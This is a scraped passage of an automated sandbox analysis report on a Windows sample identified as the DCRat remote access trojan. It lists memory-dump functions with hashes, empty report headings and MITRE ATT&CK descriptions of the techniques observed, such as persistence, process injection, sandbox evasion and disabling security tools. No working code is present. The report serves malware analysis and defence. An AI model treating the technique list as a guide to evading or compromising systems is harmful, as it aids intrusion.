Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d52716069e12b19c3e8ea7de276503faa012a5aa8f28f73a8ac3345c5f09d33e
Instruction ID: f64c41a983862e74b3d1426f96ae3428b40012579aa38426d7bf48d3609654f4
Opcode Fuzzy Hash: d52716069e12b19c3e8ea7de276503faa012a5aa8f28f73a8ac3345c5f09d33e
Instruction Fuzzy Hash: F3F03030C1864E8FEB94EFA884496E97BA0FF16704F5084BAE80DC2291DE759194CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268695, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afee5575432cc759d641b00fabdea8c367cdff8edcf41419c19e5cc77f014630
Instruction ID: 54dfee4c9d5a4d13cc81a89a972c250f416c856a5e46460e40c046dc02c95c31
Opcode Fuzzy Hash: afee5575432cc759d641b00fabdea8c367cdff8edcf41419c19e5cc77f014630
Instruction Fuzzy Hash: FAE06D31C5C50EAAEB50ABA88448AFD77E0EF09304F119876E80DD1282DE3921909710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260DA5, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2ec8d0e25ed28eb1e507b2ff56b38257122189a5f8f92f94b4d5972d16d43a
Instruction ID: 06548cb530af36303c8961ef0ad183e26872e8650bed74bea470bc17c45b85aa
Opcode Fuzzy Hash: 8a2ec8d0e25ed28eb1e507b2ff56b38257122189a5f8f92f94b4d5972d16d43a
Instruction Fuzzy Hash: 22E0C930D0851A8BEB94EB80D9549FD73A1EF6A310F015639D01E933D5CFF96900A744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362607F4, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f99ec1ba82589908a94208b833c3f771584eb5e3767330b198a2ae795db8b61
Instruction ID: 0d668405c4528f77b3640b043452582d2173d265bdcbc0c64526f596efb781a9
Opcode Fuzzy Hash: 9f99ec1ba82589908a94208b833c3f771584eb5e3767330b198a2ae795db8b61
Instruction Fuzzy Hash: C4E01A30D4D10B8AF791EB80CA44ABE7274AF22351F12E571C01E86396CFBD6545BF90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260D0F, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8605ad34eb09a23fbce4801c8a50df13858bff52aed710ed8279d72c58a33ff
Instruction ID: bc8f91b65ff189ec2628860e6cfbd48b48e26a07ea00ecfb82d137d2e7916464
Opcode Fuzzy Hash: d8605ad34eb09a23fbce4801c8a50df13858bff52aed710ed8279d72c58a33ff
Instruction Fuzzy Hash: 09E0B670A4451A8BEB94EB80C850AFD73B1FB66310F014739C01AE63E4DFB96944AB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362736B9, Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a39d5285a71a7778af6a620528a42923e66844f0802444eb7c9887974e6d9a4e
Instruction ID: caf80628ac717ff9cd2812dcf9f1a9cafab78ba369798c0f85abc791bcde3994
Opcode Fuzzy Hash: a39d5285a71a7778af6a620528a42923e66844f0802444eb7c9887974e6d9a4e
Instruction Fuzzy Hash: 38A001A0C1E10686F6109BA0911AFFE65689B46318F62A039D00D252878F6E2644769A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: DCRat

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Function 0101D5D4, Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197
filesleeptimeCOMMON

Function 01019E1C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Function 0100A5F4, Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Function 0102753D, Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Function 0100857B, Relevance: 3.9, APIs: 2, Instructions: 947
COMMONCrypto

Function 0101F063, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 0101AEE0, Relevance: 100.5, APIs: 47, Strings: 10, Instructions: 724
COMMON

Function 010100CF, Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317
libraryfileloaderCOMMON

Function 0101BDF5, Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Function 0100D341, Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555
COMMON

Function 0101CB5A, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Function 0101CE22, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre